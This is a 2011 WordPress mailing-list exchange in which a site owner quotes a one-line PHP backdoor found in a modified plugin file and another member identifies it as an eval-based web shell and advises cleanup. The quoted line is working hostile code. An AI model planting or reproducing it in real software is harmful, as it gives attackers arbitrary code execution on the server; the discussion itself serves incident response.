[wp-hackers] Possible Exploit

Jon Cave jon at lionsgoroar.co.uk
Sun Jun 12 11:56:05 UTC 2011

n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
> Just got an email from my file monitor plugin that a file had been changed -
> it is an inactive plugin file, strangely enough. Here is the content of the
> file now:
> <?php if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc'])); ?>
> Is this something dangerous?

Yes this is extremely dangerous. It's basically a backdoor to allow
arbitrary PHP code execution on your server. You should remove that
code immediately, change passwords, do a full cleanup, etc.

More information about the wp-hackers mailing list